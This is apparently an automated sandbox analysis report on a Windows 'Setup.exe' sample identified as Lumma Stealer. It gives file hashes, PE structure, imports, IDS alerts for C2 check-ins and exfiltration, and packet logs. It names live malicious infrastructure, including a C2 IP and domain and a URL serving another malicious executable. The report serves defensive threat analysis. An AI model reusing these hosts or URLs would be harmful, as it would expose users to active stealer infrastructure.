                                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaSetup.exe, 00000000.00000003.2363919422.0000000003165000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        104.21.20.178
                                                                        sturdy-operated.cyouUnited States
                                                                        13335CLOUDFLARENETUStrue
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1561424
                                                                        Start date and time:2024-11-23 12:12:11 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 5m 54s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:4
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:Setup.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                        EGA Information:Failed
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 0
                                                                        • Number of non-executed functions: 2
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target Setup.exe, PID 6924 because there are no executed function
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        TimeTypeDescription
                                                                        06:13:19API Interceptor8x Sleep call for process: Setup.exe modified
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        104.21.20.178aSxOjbS1Wr.exeGet hashmaliciousVidarBrowse
                                                                        • sanarabirlik.pw/ww/RunWW.exe
                                                                        No context
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                        • 172.67.162.84
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.162.84
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.21.33.116
                                                                        b.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.88.250
                                                                        Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.162.84
                                                                        loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.44.93
                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                        • 162.159.61.3
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.33.116
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.162.84
                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                        • 172.64.41.3
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                        • 104.21.20.178
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.20.178
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.21.20.178
                                                                        b.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.20.178
                                                                        Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.20.178
                                                                        loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.20.178
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.20.178
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.20.178
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.21.20.178
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.20.178
                                                                        No context
                                                                        No created / dropped files found
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):6.506621520132692
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:Setup.exe
                                                                        File size:8'710'648 bytes
                                                                        MD5:9afbb0324051e70f1547c64245bc2df2
                                                                        SHA1:3687efd1229f5023b1617305071652421941d52e
                                                                        SHA256:8432d382a8bc238b236f3ef6e1b075f4a1bc048a115a16eae72f0adca56e74ff
                                                                        SHA512:2be2bf2d648f97022d75a55dca5f81d964ab6872b639282ea5a7f6d3d715f2f4a3d22c428164f24533eee6ac2964394ebc8f884e2100b33a5a1b25901d5ddceb
                                                                        SSDEEP:49152:gbDYuz79c82lFKcMvk3ACBNw++LZKKv2OopZo85r5lA/UTHyPr4m/JdY+RKM1Gcs:/uqxbBN97Xm85FlTTHGXCrA6pNNWQ4A
                                                                        TLSH:54963B6133A1857EF96159F0293CAE2F106E7D290778B4DB92984D1D9DB8AC30E35F23
                                                                        File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........<L..R...R...R.......R.....!.R.......R...Q...R...W...R...V...R._.W...R.-.W...R.......R.......R...S...R.-.[...R.(.....R.......R
                                                                        Icon Hash:45a1a6aaaaaad445
                                                                        Entrypoint:0x89dab0
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x673BE60E [Tue Nov 19 01:12:46 2024 UTC]
                                                                        TLS Callbacks:0x8c86b0, 0x8c8730
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:5
                                                                        OS Version Minor:1
                                                                        File Version Major:5
                                                                        File Version Minor:1
                                                                        Subsystem Version Major:5
                                                                        Subsystem Version Minor:1
                                                                        Import Hash:5f9c4c530d93260baff0b3f583edf984
                                                                        Signature Valid:false
                                                                        Signature Issuer:CN=GlobalSign GCC R45 CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                        Error Number:-2146869232
                                                                        Not Before, Not After
                                                                        • 24/11/2022 03:58:04 20/02/2026 03:58:04
                                                                        Subject Chain
                                                                        • CN=Franz Josef Wechselberger, O=Franz Josef Wechselberger, L=Hainzenberg, S=Tirol, C=AT
                                                                        Version:3
                                                                        Thumbprint MD5:A1F139CE99F63FBE0F981EB442FA1CA0
                                                                        Thumbprint SHA-1:DDEF07D6E8BA075FDD533B498A7D314F973DA83A
                                                                        Thumbprint SHA-256:E39E3C64515EA90D5ADE352664FF0AC6F1F0F6981B804A188F00599456E05FFE
                                                                        Serial:1B1A623EC9C6C3F7A15E4CCC
                                                                        Instruction
                                                                        call 00007F1E28DA25E9h
                                                                        jmp 00007F1E28DA19CDh
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        push 00000000h
                                                                        call dword ptr [00955170h]
                                                                        push dword ptr [ebp+08h]
                                                                        call dword ptr [0095516Ch]
                                                                        push C0000409h
                                                                        call dword ptr [0095526Ch]
                                                                        push eax
                                                                        call dword ptr [00955120h]
                                                                        pop ebp
                                                                        ret
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        sub esp, 00000324h
                                                                        push 00000017h
                                                                        call 00007F1E28DCA455h
                                                                        test eax, eax
                                                                        je 00007F1E28DA1B57h
                                                                        push 00000002h
                                                                        pop ecx
                                                                        int 29h
                                                                        mov dword ptr [00B62A50h], eax
                                                                        mov dword ptr [00B62A4Ch], ecx
                                                                        mov dword ptr [00B62A48h], edx
                                                                        mov dword ptr [00B62A44h], ebx
                                                                        mov dword ptr [00B62A40h], esi
                                                                        mov dword ptr [00B62A3Ch], edi
                                                                        mov word ptr [00B62A68h], ss
                                                                        mov word ptr [00B62A5Ch], cs
                                                                        mov word ptr [00B62A38h], ds
                                                                        mov word ptr [00B62A34h], es
                                                                        mov word ptr [00B62A30h], fs
                                                                        mov word ptr [00B62A2Ch], gs
                                                                        pushfd
                                                                        pop dword ptr [00B62A60h]
                                                                        mov eax, dword ptr [ebp+00h]
                                                                        mov dword ptr [00B62A54h], eax
                                                                        mov eax, dword ptr [ebp+04h]
                                                                        mov dword ptr [00B62A58h], eax
                                                                        lea eax, dword ptr [ebp+08h]
                                                                        mov dword ptr [00B62A64h], eax
                                                                        mov eax, dword ptr [ebp-00000324h]
                                                                        mov dword ptr [00B629A0h], 00010001h
                                                                        Programming Language:
                                                                        • [C++] VS2015 UPD3.1 build 24215
                                                                        • [ C ] VS2008 SP1 build 30729
                                                                        • [IMP] VS2008 SP1 build 30729
                                                                        • [RES] VS2015 UPD3 build 24213
                                                                        • [LNK] VS2015 UPD3.1 build 24215
                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x73efac0xf0.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x7680000x38c1d.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x84bc000x2df8.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a10000x5cdc4.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x683f000x70.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x683fcc0x18.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x683f700x40.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x5550000x4ac.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x5533780x5534001bcf1e874d49fbab928b46f9dceab092unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x5550000x1eb9de0x1eba00537cdd85d6d0ef5d3af826c63bd46b51False0.2115835756737859Applesoft BASIC program data, first line number 1164.707412364146742IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x7410000x259d80x21200e73619ac6dca1bbe2cc5602584b2d4d4False0.16972287735849056data5.204107514023323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .tls0x7670000x990x2008e3343efa9afc26ac6caf49228cbe049False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .rsrc0x7680000x38c1d0x38e004d3cbc6146233375b1585d71492c9d6eFalse0.19540693681318683data5.3955782918527015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x7a10000xb28000xb280093c424b3704ec68ffae26977ce97e8c6False0.5799194677871149GeoSwath RDF7.400171789015709IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0x7682800x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 6912EnglishUnited States0.2531352235550709
                                                                        RT_ICON0x769f280x368Device independent bitmap graphic, 16 x 32 x 24, image size 768EnglishUnited States0.24655963302752293
                                                                        RT_ICON0x76a2900x32028Device independent bitmap graphic, 256 x 512 x 24, image size 196608EnglishUnited States0.18309900410076158
                                                                        RT_ICON0x79c2b80xca8Device independent bitmap graphic, 32 x 64 x 24, image size 3072EnglishUnited States0.3345679012345679
                                                                        RT_ICON0x79cf600x3228Device independent bitmap graphic, 64 x 128 x 24, image size 12288EnglishUnited States0.2510903426791277
                                                                        RT_DIALOG0x7a01880x270dataEnglishUnited States0.5032051282051282
                                                                        RT_STRING0x7a03f80x31cdataEnglishUnited States0.3944723618090452
                                                                        RT_GROUP_ICON0x7a07140x4cdataEnglishUnited States0.7894736842105263
                                                                        RT_VERSION0x7a07600x340dataEnglishUnited States0.4579326923076923
                                                                        RT_MANIFEST0x7a0aa00x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                        DLLImport
                                                                        WS2_32.dllhtonl, WSAStringToAddressW, ntohl, closesocket, inet_ntoa, gethostbyaddr, getservbyport, gethostbyname, inet_addr, setsockopt, bind, listen, WSAEventSelect, shutdown, WSASetLastError, ioctlsocket, accept, WSAEnumProtocolsW, WSCGetProviderPath, WSASocketW, connect, WSAEnumNetworkEvents, WSAGetOverlappedResult, WSARecv, WSAGetLastError, getservbyname, ntohs, getsockname, WSASend, getpeername, WSACleanup, htons, WSAStartup
                                                                        KERNEL32.dllGetEnvironmentVariableW, FoldStringW, FindFirstFileW, FindClose, LoadLibraryExW, GetNumberOfConsoleInputEvents, GetConsoleScreenBufferInfo, SetConsoleCursorInfo, SetConsoleCursorPosition, SetConsoleTextAttribute, GetConsoleCursorInfo, SetConsoleMode, GetConsoleMode, CreateFileW, SetFilePointer, OpenEventW, CreateFileMappingA, MapViewOfFile, UnmapViewOfFile, WaitNamedPipeW, FileTimeToSystemTime, SystemTimeToFileTime, SetHandleInformation, CreateNamedPipeW, ConnectNamedPipe, Sleep, SetEndOfFile, MulDiv, DeleteFileW, CopyFileW, ProcessIdToSessionId, TerminateProcess, GetLogicalDrives, SetCurrentDirectoryW, GetExitCodeProcess, SetEnvironmentVariableW, SystemTimeToTzSpecificLocalTime, GetDateFormatW, GetTimeFormatW, OutputDebugStringW, GetStringTypeW, CreateMutexW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, LCMapStringW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, WaitForSingleObjectEx, InitializeSListHead, GetStartupInfoW, QueryPerformanceCounter, RtlUnwind, InterlockedPushEntrySList, ReadConsoleInputA, ExitThread, FreeLibraryAndExitThread, HeapAlloc, HeapReAlloc, HeapFree, GetCommandLineA, SwitchToFiber, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetComputerNameExW, GetProcessHeap, GetTimeZoneInformation, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetStdHandle, SetFilePointerEx, FlushFileBuffers, GetFileAttributesW, GetModuleFileNameW, GetModuleHandleExW, InterlockedCompareExchange, CreateProcessW, ResetEvent, WaitForSingleObject, GetCurrentProcessId, MultiByteToWideChar, WideCharToMultiByte, LeaveCriticalSection, TryEnterCriticalSection, EnterCriticalSection, InitializeCriticalSection, InterlockedDecrement, InterlockedIncrement, InterlockedExchangeAdd, SwitchToThread, InterlockedExchange, ConvertThreadToFiber, ConvertFiberToThread, DeleteCriticalSection, DecodePointer, GetWindowsDirectoryW, GetLongPathNameW, GetFullPathNameW, GetTempPathW, GetConsoleTitleW, GetModuleHandleA, LoadLibraryW, GetSystemDirectoryW, VerSetConditionMask, GetCurrentProcess, FreeLibrary, RtlCaptureStackBackTrace, RaiseException, InitializeCriticalSectionAndSpinCount, IsDebuggerPresent, GetCommandLineW, SetConsoleTitleW, CreateEventW, GetLastError, SetLastError, CloseHandle, SetEvent, SetConsoleCtrlHandler, CreateFiberEx, GetSystemTime, CreateFileA, OutputDebugStringA, CompareStringW, GetProcAddress, GetModuleHandleW, ExitProcess, HeapSize, GetCurrentDirectoryW, GetModuleFileNameA, DebugBreak, FormatMessageW, lstrlenW, LocalFree, ReadFile, ReadConsoleW, IsDBCSLeadByteEx, WriteFile, WriteConsoleW, GetFileSizeEx, GetFileType, GetLocaleInfoW, GetOEMCP, GetACP, GetConsoleOutputCP, GetConsoleCP, GetStdHandle, WaitForMultipleObjects, GetCurrentThreadId, ReleaseMutex, CreateThread, GetNumberFormatW, LocalSize, LocalAlloc, CancelIo, DeleteFiber, EncodePointer, ReadConsoleInputW, FillConsoleOutputCharacterW, WaitForMultipleObjectsEx, GetFileSize, GetFileTime, SetFileTime, MoveFileExW, ExpandEnvironmentStringsW, CreateDirectoryW, RemoveDirectoryW, QueryPerformanceFrequency, GetLocalTime, LoadLibraryA, GetSystemDirectoryA, GetOverlappedResult
                                                                        USER32.dllCallWindowProcW, RemovePropA, GetPropA, CharUpperW, DestroyIcon, MessageBoxA, wsprintfA, GetProcessWindowStation, GetUserObjectInformationW, GetKeyState, CharLowerW, SendMessageW, GetSysColor, MessageBeep, ReleaseDC, GetDC, FindWindowW, CharLowerBuffW, MessageBoxW
                                                                        Secur32.dllVerifySignature, QuerySecurityPackageInfoA, EnumerateSecurityPackagesA, FreeContextBuffer, MakeSignature, InitializeSecurityContextW, AcquireCredentialsHandleW, AcquireCredentialsHandleA, AcceptSecurityContext, InitializeSecurityContextA, DeleteSecurityContext, FreeCredentialsHandle
                                                                        USERENV.dllGetUserProfileDirectoryW
                                                                        GDI32.dllGetDeviceCaps, DeleteDC
                                                                        ADVAPI32.dllAddAccessAllowedAceEx, EqualSid, LookupAccountSidW, GetTokenInformation, OpenProcessToken, RegNotifyChangeKeyValue, GetNamedSecurityInfoW, CryptGenRandom, CryptReleaseContext, CryptAcquireContextA, RegCloseKey, RegCreateKeyExW, RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, SetSecurityDescriptorControl, SetSecurityDescriptorDacl, SetSecurityDescriptorOwner, InitializeSecurityDescriptor, GetAclInformation, RegDeleteValueW, RegQueryInfoKeyW, RegEnumValueW, RegEnumKeyExW, GetUserNameW, IsValidSid, GetSidSubAuthority, GetLengthSid, CopySid, GetSidLengthRequired, InitializeSid, SetEntriesInAclW
                                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree
                                                                        IPHLPAPI.DLLGetTcpTable
                                                                        CRYPT32.dllCryptUnprotectData, CryptProtectData
                                                                        SHELL32.dllSHGetFolderPathW, SHFileOperationW, ShellExecuteExW
                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States
                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-11-23T12:13:19.675065+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649730104.21.20.178443TCP
                                                                        2024-11-23T12:13:20.365527+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649730104.21.20.178443TCP
                                                                        2024-11-23T12:13:20.365527+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649730104.21.20.178443TCP
                                                                        2024-11-23T12:13:21.651074+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649739104.21.20.178443TCP
                                                                        2024-11-23T12:13:22.372936+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649739104.21.20.178443TCP
                                                                        2024-11-23T12:13:22.372936+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649739104.21.20.178443TCP
                                                                        2024-11-23T12:13:23.998294+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649745104.21.20.178443TCP
                                                                        2024-11-23T12:13:26.122673+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649750104.21.20.178443TCP
                                                                        2024-11-23T12:13:28.323221+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649756104.21.20.178443TCP
                                                                        2024-11-23T12:13:30.769012+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649762104.21.20.178443TCP
                                                                        2024-11-23T12:13:31.363301+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649762104.21.20.178443TCP
                                                                        2024-11-23T12:13:32.988573+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649769104.21.20.178443TCP
                                                                        2024-11-23T12:13:36.449361+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649779104.21.20.178443TCP
                                                                        2024-11-23T12:13:37.141318+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649779104.21.20.178443TCP
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 23, 2024 12:13:18.395561934 CET49730443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:18.395593882 CET44349730104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:18.395674944 CET49730443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:18.399002075 CET49730443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:18.399014950 CET44349730104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:19.674957991 CET44349730104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:19.675065041 CET49730443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:19.676727057 CET49730443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:19.676733017 CET44349730104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:19.677131891 CET44349730104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:19.731792927 CET49730443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:19.740686893 CET49730443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:19.740714073 CET49730443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:19.740871906 CET44349730104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:20.365616083 CET44349730104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:20.365921021 CET44349730104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:20.365983963 CET49730443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:20.367698908 CET49730443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:20.367708921 CET44349730104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:20.367736101 CET49730443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:20.367741108 CET44349730104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:20.425740004 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:20.425810099 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:20.425906897 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:20.426214933 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:20.426249981 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:21.650985956 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:21.651073933 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:21.652303934 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:21.652328014 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:21.653103113 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:21.654443026 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:21.654484987 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:21.654606104 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.373003006 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.373131037 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.373178005 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:22.373209953 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.373325109 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.373373032 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:22.373390913 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.380924940 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.381004095 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.381040096 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:22.381061077 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.381115913 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:22.384591103 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.392980099 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.393044949 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:22.393060923 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.434911966 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:22.434927940 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.481774092 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:22.493045092 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.544274092 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:22.564469099 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.564646959 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.564846039 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:22.564870119 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.564938068 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:22.565056086 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:22.565079927 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.565104961 CET49739443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:22.565119982 CET44349739104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.694128990 CET49745443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:22.694169044 CET44349745104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:22.694433928 CET49745443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:22.694761992 CET49745443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:22.694782972 CET44349745104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:23.998219967 CET44349745104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:23.998294115 CET49745443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:23.999675989 CET49745443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:23.999686003 CET44349745104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:23.999917984 CET44349745104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:24.001125097 CET49745443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:24.001259089 CET49745443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:24.001296043 CET44349745104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:24.724199057 CET44349745104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:24.724293947 CET44349745104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:24.724405050 CET49745443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:24.724570990 CET49745443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:24.724625111 CET44349745104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:24.907560110 CET49750443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:24.907604933 CET44349750104.21.20.178192.168.2.6
                                                                        Nov 23, 2024 12:13:24.907680035 CET49750443192.168.2.6104.21.20.178
                                                                        Nov 23, 2024 12:13:24.908035040 CET49750443192.168.2.6104.21.20.178
